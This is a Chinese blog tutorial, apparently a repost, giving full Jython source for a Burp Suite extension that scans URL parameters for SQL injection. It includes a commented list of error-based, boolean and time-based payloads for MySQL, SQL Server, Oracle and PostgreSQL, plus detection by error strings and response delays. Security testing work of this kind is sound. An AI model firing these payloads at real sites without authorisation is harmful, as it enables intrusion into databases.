使用Burp Suite和Python进行自动化漏洞挖掘—SQL测试注入插件

这篇具有很好参考价值的文章主要介绍了使用Burp Suite和Python进行自动化漏洞挖掘—SQL测试注入插件。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

每次测注入都是用burp的Intruder模块,很不方便就是批量跑批量测哪些没有过滤

懒人鹅上线,准备搞一个sql测试的插件

本篇文章代码量大,基础可以去看上一篇

一、 需求分析

测试sql基本注入的载荷,在可能有sql注入的地方发送测试包,目前只测试url中的,并可以根据错误回显判断出数据库类型,需要有用户界面,可以加载到Burp的Extensions模块

二、编写代码

上面这个burp包需要下载

        pip install  burp

我加注释的地方是中文的最好复制后导入burp前删掉,不然可能会导入报错

里面打印出来的结果也用的是英文,感觉burp兼容中文性不高

需要注意改动代码按照python2.7版本去,如果比这个版本高的方式写可能导入会报错

如:

#下面这种方式就用不了因为不支持
print(f"Testing payload: {payload}")

#这个就可以
print("Testing payload: {}".format(payload))
from burp import IBurpExtender, IContextMenuFactory, ITab, IScannerCheck, IScanIssue, IHttpService, IHttpRequestResponse, IExtensionStateListener, IParameter, IProxyListener, IScannerInsertionPointProvider, IScannerInsertionPoint, IBurpExtenderCallbacks
from javax.swing import JTabbedPane, JPanel, JButton, JTextArea, JScrollPane, SwingConstants, GroupLayout, JTextField, JMenuItem, SwingUtilities
from java.awt import BorderLayout, Color
from java.util import ArrayList
from java.awt.event import ActionListener
from java.net import URL
import sys
import threading

class ScanIssue(IScanIssue):

    def __init__(self, helpers, http_service, url, request_response, name, detail, severity, confidence):
        self._helpers = helpers
        self._http_service = http_service
        self._url = url
        self._request_response = request_response
        self._name = name
        self._detail = detail
        self._severity = severity
        self._confidence = confidence
        

    def getUrl(self):
        return self._url

    def getIssueName(self):
        return self._name

    def getIssueType(self):
        return 0

    def getSeverity(self):
        return self._severity

    def getConfidence(self):
        return self._confidence

    def getIssueBackground(self):
        return None

    def getRemediationBackground(self):
        return None

    def getIssueDetail(self):
        return self._detail

    def getRemediationDetail(self):
        return None

    def getHttpMessages(self):
        return self._request_response

    def getHttpService(self):
        return self._http_service


class BurpExtender(IBurpExtender, ITab, IScannerCheck, IContextMenuFactory, ActionListener, IScannerInsertionPointProvider):

    def registerExtenderCallbacks(self, callbacks):
        self._callbacks = callbacks
        self._helpers = callbacks.getHelpers()

        self._scan_lock = threading.Lock()
        self._tabbedPane = JTabbedPane()
        self.initUI()
        
        callbacks.registerScannerInsertionPointProvider(self)
        #模块名称
        callbacks.setExtensionName("SQL Injection Scanner")
        callbacks.registerContextMenuFactory(self)
        callbacks.customizeUiComponent(self._tabbedPane)
        callbacks.registerScannerCheck(self)
        callbacks.addSuiteTab(self)

    def initUI(self):
        self._mainPanel = JPanel(BorderLayout())

        self._urlInput = JTextField(50)

        self._scanButton = JButton("Start Scan", actionPerformed=self.start_scan)

        self._scanOutput = JTextArea()
        self._scanOutput.setEditable(False)
        scrollPane = JScrollPane(self._scanOutput)

        layout = GroupLayout(self._mainPanel)
        self._mainPanel.setLayout(layout)
        layout.setAutoCreateGaps(True)
        layout.setAutoCreateContainerGaps(True)

        layout.setHorizontalGroup(
            layout.createParallelGroup(GroupLayout.Alignment.CENTER)
                .addGroup(layout.createSequentialGroup()
                    .addComponent(self._urlInput)
                    .addComponent(self._scanButton))
                .addComponent(scrollPane)
        )

        layout.setVerticalGroup(
            layout.createSequentialGroup()
                .addGroup(layout.createParallelGroup(GroupLayout.Alignment.BASELINE)
                    .addComponent(self._urlInput)
                    .addComponent(self._scanButton))
                .addComponent(scrollPane)
        )

        self._tabbedPane.addTab("SQL Injection Scanner", self._mainPanel)

    def getTabCaption(self):
        return "SQL Injection Scanner"

    def getUiComponent(self):
        return self._tabbedPane

    def createInsertionPoints(self, baseRequestResponse):
        request_info = self._helpers.analyzeRequest(baseRequestResponse)
        parameters = request_info.getParameters()

        insertion_points = []
        for param in parameters:
            if param.getType() != IParameter.PARAM_URL:
                continue

            # 创建自定义插入点
            insertion_point = CustomInsertionPoint(self._helpers, baseRequestResponse.getRequest(), param)
            insertion_points.append(insertion_point)

        return insertion_points

       
    def start_scan(self, event):
        print("Start Scan button clicked.")
        thread = threading.Thread(target=self.scan_logic)
        thread.start()


    def scan_logic(self):

        try:
            print("scan_logic started")
            target_url = self._urlInput.getText()
            try:
                url = URL(target_url)
            except Exception as e:
                print("Error: Invalid URL")
                SwingUtilities.invokeLater(lambda: self._scanOutput.append("Error: Invalid URL\n"))
                return

            baseRequestResponse = self._callbacks.makeHttpRequest(
                self._helpers.buildHttpService(url.getHost(), url.getPort(), url.getProtocol() == "https"),
                self._helpers.stringToBytes("GET {} HTTP/1.1\r\nHost: {}\r\n\r\n".format(url.getPath(), url.getHost()))
            )
            # Manually parse the URL to get the query string
            query_string = url.getQuery()

            if not query_string:
                print("No query string found.")
                return

            # Split the query string into parameters
            query_params = query_string.split("&")

            # Create a list to store the parameters
            params = []

            # 遍历查询参数
            for query_param in query_params:
                # Split the parameter into name and value
                name, value = query_param.split("=", 1)
                # Create a new URL parameter and add it to the list
                param = self._helpers.buildParameter(name, value, IParameter.PARAM_URL)
                params.append(param)

            print("Number of parameters found:", len(params))

            # 检查参数是否存在
            if not params:
                print("No parameters found.")
                return

            # 创建列表插入点
            insertion_points = []

            # 遍历参数
            for param in params:
                print("Creating insertion point for parameter:", param.getName())
                # Create an instance of your custom insertion point class
                insertion_point = CustomInsertionPoint(self._helpers, baseRequestResponse.getRequest(), param)
                insertion_points.append(insertion_point)

            # 打印插入点数量
            print("Number of insertion points created:", len(insertion_points))

            issues = self.doActiveScan(baseRequestResponse, [])
            if issues:
                for issue in issues:
                    print("Found issue: {} - {}".format(issue.getUrl(), issue.getIssueName()))
                    SwingUtilities.invokeLater(lambda: self._scanOutput.append("{} - {}\n".format(issue.getUrl(), issue.getIssueName())))
            else:
                print("No issues found.")
                SwingUtilities.invokeLater(lambda: self._scanOutput.append("{} - Scan result\n".format(target_url)))
            print("scan_logic method finished.")
            SwingUtilities.invokeLater(lambda: self._callbacks.issueAlert("Start scan clicked"))
            # 定义sql注入payload
            payloads = [
                "'",                     
                '"',                     
                " OR 1=1",               
                "' OR '1'='1",           
                " AND SLEEP(3)",         
                "'; WAITFOR DELAY '0:0:3';",
                " AND 1=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65)||CHR(66)||CHR(67),3)", 
                "' AND 1=utl_inaddr.get_host_address((SELECT banner FROM v$version WHERE rownum=1))--",
                "' AND 1=CAST(0x5F21403264696C656D6D61 AS varchar(8000))--",
                "' AND extractvalue(1,concat(0x5c, (SELECT @@version)))",
                "' AND 1=pg_sleep(3)--",
                "' AND 1=(SELECT banner FROM v$version WHERE rownum=1)--",
                " AND 1=(SELECT @@version)--"
            ]

            # 遍历插入payload
            for insertion_point in insertion_points:
                print("Testing insertion point: {}".format(insertion_point.getInsertionPointName()))
                self._original_response = baseRequestResponse.getResponse()
                self._original_response_body = self._helpers.bytesToString(self._original_response)
                for payload in payloads:
                    # print("Testing insertion point: ",insertion_point.getInsertionPointName())
                    # print("Testing payload: ",payload)

                    # # Insert the payload into the request
                    # modified_request = insertion_point.buildRequest(payload)

                    # # Send the modified request
                    # checkRequestResponse = self._callbacks.makeHttpRequest(
                    #     baseRequestResponse.getHttpService(), modified_request)

                    # # Check if the response indicates a potential SQL injection
                    # if self.check_for_sql_injection(checkRequestResponse.getResponse()):
                    #     print("Potential SQL injection found with payload: ",payload)

                    #     # Add the issue to the SQL Injection Scanner module
                    #     SwingUtilities.invokeLater(lambda: self._scanOutput.append(
                    #         "{} - Potential SQL injection with payload: {}\n".format(target_url, payload)
                    #     ))
                    # else:
                    #     print("No issues found with payload: ",payload)
                    #     SwingUtilities.invokeLater(lambda: self._scanOutput.append(
                    #         "{} - No issues found with payload: {}\n".format(target_url, payload)
                    #     ))
                    print("Testing payload: {}".format(payload))
                    attack_request = insertion_point.buildRequest(payload)
                    attack_response = self._callbacks.makeHttpRequest(
                        baseRequestResponse.getHttpService(),
                        attack_request
                    )
                    if self.check_sql_injection(attack_response, payload):
                        print("Potential SQL injection found with payload:",payload)
                        SwingUtilities.invokeLater(lambda: self._scanOutput.append(
                            "{} - Potential SQL injection with payload: {}\n".format(target_url, payload)
                        ))
                    else:
                        print("No issues found with payload:", payload)
                        SwingUtilities.invokeLater(lambda: self._scanOutput.append(
                            "{} - No issues found with payload: {}\n".format(target_url, payload)
                        ))
            print("scan_logic method finished.")
        except Exception as e:
            print("scan_logic error: ", e)


    def check_for_sql_injection(self, response):
        sql_errors = [
            "You have an error in your SQL syntax",
            "Warning: mysql_",
            "Warning: mysqli_",
            "Fatal error: Uncaught PDOException",
            "syntax error or access violation"
        ]

        response_str = self._helpers.bytesToString(response)
        for sql_error in sql_errors:
            if sql_error in response_str:
                return True

        return False


    #这个方法里面的内容其实我合并到上面scann方法里面了
    def doActiveScan(self, baseRequestResponse, insertionPoint):
        print("Number of insertion points created: {}".format(len(insertionPoint)))
        issues = []
        if not insertionPoint:
            insertion_points = self.createInsertionPoints(baseRequestResponse)
        else:
            insertion_points = [insertionPoint]

        # for insertion_point in insertion_points:
        #     print("Testing insertion point: {}".format(insertion_point.getInsertionPointName()))
        #     self._original_response = baseRequestResponse.getResponse()
        #     self._original_response_body = self._helpers.bytesToString(self._original_response)
        #     payloads = [
        #         "'",                     
        #         '"',                     
        #         " OR 1=1",               
        #         "' OR '1'='1",           
        #         " AND SLEEP(3)",         
        #         "'; WAITFOR DELAY '0:0:3';",
        #         " AND 1=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65)||CHR(66)||CHR(67),3)", 
        #         "' AND 1=utl_inaddr.get_host_address((SELECT banner FROM v$version WHERE rownum=1))--",
        #         "' AND 1=CAST(0x5F21403264696C656D6D61 AS varchar(8000))--",
        #         "' AND extractvalue(1,concat(0x5c, (SELECT @@version)))",
        #         "' AND 1=pg_sleep(3)--",
        #         "' AND 1=(SELECT banner FROM v$version WHERE rownum=1)--",
        #         " AND 1=(SELECT @@version)--"
        #     ]

        #     for payload in payloads:
        #         print("Testing payload: {}".format(payload))
        #         attack_request = insertion_point.buildRequest(payload)
        #         attack_response = self._callbacks.makeHttpRequest(
        #             baseRequestResponse.getHttpService(),
        #             attack_request
        #         )
        #         if self.check_sql_injection(attack_response, payload):
        #             issues.append(self.create_scan_issue(baseRequestResponse, attack_request, attack_response))
        #         else:
        #             print("No issues found with payload: {}".format(payload))
        return issues
        

    def check_sql_injection(self, response, payload):
        response_body = self._helpers.bytesToString(response.getResponse())
        sql_errors = [
            "SQL syntax",
            "MySQL error",
            "SQL error",
            "syntax error",
            "ORA-01756",
            "Microsoft OLE DB Provider for ODBC Drivers error",
            "Unclosed quotation mark",
            "Error Executing Database Query"
        ]

        for error in sql_errors:
            if error in response_body:
                return True

        if " OR 1=1" in payload or "' OR '1'='1" in payload:
             if response_body != self._original_response_body:
                return True

        time_based_payloads = [" AND SLEEP(", "'; WAITFOR DELAY '", " AND 1=DBMS_PIPE.RECEIVE_MESSAGE(", "' AND 1=pg_sleep("]
        if any(p in payload for p in time_based_payloads):
            time_difference = self._helpers.analyzeResponse(response.getResponse()).getTime() - self._helpers.analyzeResponse(self._original_response).getTime()

            if time_difference >= 3000:
                return True

        return False

    def create_scan_issue(self, baseRequestResponse, attack_request, attack_response):
        return ScanIssue(
            self._helpers,
            baseRequestResponse.getHttpService(),
            self._helpers.analyzeRequest(baseRequestResponse).getUrl(),
            [self._callbacks.applyMarkers(baseRequestResponse, None, None), self._callbacks.applyMarkers(attack_response, None, None)],
            "SQL Injection",
            "High",
            "Certain"
        )

    def send_to_scanner(self, event):
        messages = self._current_invocation.getSelectedMessages()
        if messages:
            url = messages[0].getUrl()
            self._urlInput.setText(url.toString())
        ui_component = self.getUiComponent()
        ui_component.setForeground(Color.red)
        self._callbacks.customizeUiComponent(ui_component)
        # self._callbacks.customizeUiComponent(self.getUiComponent().setForeground(Color.red))

    def createMenuItems(self, invocation):
        self._current_invocation = invocation
        menu_items = ArrayList()
        menu_item = JMenuItem("Send to SQL Injection Scanner", actionPerformed=self.send_to_scanner)
        menu_items.add(menu_item)
        return menu_items

    def menuItemClicked(self, event):
        current_request = self._callbacks.getSelectedMessages()[0]
        base_request_response = current_request.getRequestResponse()
        issues = self.doActiveScan(base_request_response, None)
        for issue in issues:
            print("{} - {}".format(issue.getUrl(), issue.getIssueName()))


    def doPassiveScan(self, baseRequestResponse):
        return []


class CustomInsertionPoint(IScannerInsertionPoint):
    def __init__(self, helpers, request, parameter=None, is_path_insertion_point=False):
        self._helpers = helpers
        self._request = request
        self._parameter = parameter
        self._is_path_insertion_point = is_path_insertion_point

    def getInsertionPointName(self):
        if self._is_path_insertion_point:
            return "Custom Path Insertion Point"
        return "Custom Insertion Point: {}".format(self._parameter.getName())

    def getBaseValue(self):
        if self._is_path_insertion_point:
            return self._helpers.analyzeRequest(self._request).getUrl().getPath()
        return self._parameter.getValue()

    def buildRequest(self, payload):
        if self._is_path_insertion_point:
            url = self._helpers.analyzeRequest(self._request).getUrl()
            new_path = url.getPath() + payload
            new_url = URL(url.getProtocol(), url.getHost(), url.getPort(), new_path)
            return self._helpers.buildHttpRequest(new_url)
        return self._helpers.updateParameter(self._request, self._helpers.buildParameter(self._parameter.getName(), payload, self._parameter.getType()))

    def getPayloadOffsets(self, payload):
        return None

    def getInsertionPointType(self):
        return IScannerInsertionPoint.INS_PARAM_URL

三、数据库类型检测

        增加针对不同数据库类型的攻击载荷,并添加检测时间盲注和布尔盲注的方法。这将使得扩展更加强大,能够检测到更多类型的SQL注入攻击。

payloads = [
    "'",                     # 错误提示
    '"',                     # 错误提示
    " OR 1=1",               # 布尔盲注
    "' OR '1'='1",           # 布尔盲注
    " AND SLEEP(3)",         # MySQL时间盲注
    "'; WAITFOR DELAY '0:0:3';",    # SQL Server时间盲注
    " AND 1=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65)||CHR(66)||CHR(67),3)", # Oracle时间盲注
    "' AND 1=utl_inaddr.get_host_address((SELECT banner FROM v$version WHERE rownum=1))--", # Oracle基于错误的注入
    "' AND 1=CAST(0x5F21403264696C656D6D61 AS varchar(8000))--",  # SQL Server基于错误的注入
    "' AND extractvalue(1,concat(0x5c, (SELECT @@version)))", # MySQL基于错误的注入
    "' AND 1=pg_sleep(3)--",    # PostgreSQL时间盲注
    "' AND 1=(SELECT banner FROM v$version WHERE rownum=1)--",  # Oracle布尔盲注
    " AND 1=(SELECT @@version)--"  # MySQL布尔盲注
]

四、测试

burp插件开发python,Burp Suite—拓展利用,自动化,安全,网络安全,python

名字啥的都可以在代码里面更改

还有就是这是最基础的检测,还不如sqlmap,有兴趣的师傅可以和我一起完善一下

burp插件开发python,Burp Suite—拓展利用,自动化,安全,网络安全,python

 

burp插件开发python,Burp Suite—拓展利用,自动化,安全,网络安全,python


 本篇文章只用作技术交流,利用文章内的技术进行违法活动,均与本博主无关!

寻找志同道合的师傅一起完善哈文章来源地址https://www.toymoban.com/news/detail-701673.html

到了这里,关于使用Burp Suite和Python进行自动化漏洞挖掘—SQL测试注入插件的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • 使用 Python 进行 Windows GUI 自动化

      在今天的文章中,我们将探讨如何使用 Python 进行 Windows GUI 自动化。GUI 自动化可以帮助我们自动执行许多与操作系统交互的任务,比如移动鼠标、点击按钮、输入文本、移动窗口等。Python 提供了两个强大的库:pyautogui 和 pywinauto,使得 GUI 自动化变得简单。接下来我们详细

    2024年02月11日
    浏览(41)
  • “利用Python使用API进行数据集成和自动化开发的指南“

    标题:利用Python使用API进行数据集成和自动化开发的指南 摘要:本文将为读者提供一个详细而全面的指南,教您如何使用Python编程语言来利用API进行数据集成和自动化开发。我们将介绍API的基本概念,探讨Python中常用的API库和工具,以及演示如何通过编写Python代码来调用和处

    2024年02月13日
    浏览(64)
  • 从零开始学习:如何使用Selenium和Python进行自动化测试?

    安装selenium 打开命令控制符输入:pip install -U selenium 火狐浏览器安装firebug:www.firebug.com,调试所有网站语言,调试功能 Selenium IDE 是嵌入到Firefox 浏览器中的一个插件,实现简单的浏览器操 作的录制与回放功能,IDE 录制的脚本可以可以转换成多种语言,从而帮助我们快速的开

    2024年04月23日
    浏览(81)
  • 【安全测试学习】自动化注入攻击之 FuzzDB和Burp 组合拳

    一、FuzzDB 开源的应用程序模糊测试数据库,包含了各种攻击 payload 的测试用例集合。 主要功能: OS 命令注入 目录遍历 文件上传绕过 身份验证绕过 XSS SQL 注入 HTTP 头注入 CRLF 注入 NoSQL 注入等 还包含了一些用不同语言写成的 webshell 与常用的账号密码字典。 github地址: GitH

    2023年04月08日
    浏览(57)
  • 自动化漏洞扫描工具Goby介绍、下载、使用、插件、功能

    介绍 Goby 是一款新的网络安全测试工具,它能够针对一个目标企业梳理最全的攻击面信息,同时能进行高效、实战化漏洞扫描,并快速地从一个验证入口点,切换到横向。我们希望能够输出更具生命力的工具,能够对标黑客的实际能力,帮助企业来有效地理解和应对网络攻击

    2024年02月17日
    浏览(61)
  • 使用AWS和Kubernetes进行流程自动化:自动化部署和监控

    作者:禅与计算机程序设计艺术 机器学习、深度学习和自动化技术正在成为信息技术行业的新趋势。2017年以来,越来越多的企业开始采用机器学习技术解决业务上的实际问题。这项技术的应用已经从统计学模型逐渐转向基于数据的分析方法。随着云计算技术的蓬勃发展,越

    2024年02月07日
    浏览(40)
  • chatgpt赋能python:如何利用Python进行自动化办公

    在现代办公环境中,自动化成为了一种趋势。利用计算机程序自动处理重复性劳动,可以提高生产效率和工作质量,同时也能够让工作更加轻松。Python作为一种常用的编程语言,在自动化办公中发挥了重要作用。 自动化办公是指利用计算机程序自动完成办公工作的一种方式。

    2024年02月11日
    浏览(57)
  • 基于k6和python进行自动化性能测试

    摘要: 在性能测试中,达到相应的性能指标对于一个软件来说十分重要,在本文中,将介绍一种现代化性能测试工具k6。 本文分享自华为云社区《基于k6和python进行自动化性能测试》,作者: 风做了云的梦。 当我们开发完成一个应用程序时,往往需要对其进行性能测试,以

    2024年02月10日
    浏览(45)
  • 使用ApiPost进行接口自动化测试

    自动化测试模块是针对测试人员的复杂业务的测试服务。可以在测试用例中建立一个或多个“测试计划”,“测试计划”由接口和控制器组成。 1、创建步骤 1、在API设计或API调试内保存接口。 2、打开自动化测试-测试用例,新建一个测试计划。 3、在右侧的API添加器内添加接

    2024年02月05日
    浏览(47)
  • 使用Postman进行接口自动化测试

    我们先思考一下,如果需要达到自动化接口测试的效果,那么我们在基本的模拟请求上还需要做哪些呢? 以下我粗略概括为 3 个问题(欢迎更多补充与建议): 如何判断接口是否请求成功 如何进行接口批量、定期测试 如何处理依赖接口问题(比如商品下单的接口必须要求

    2024年01月18日
    浏览(58)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包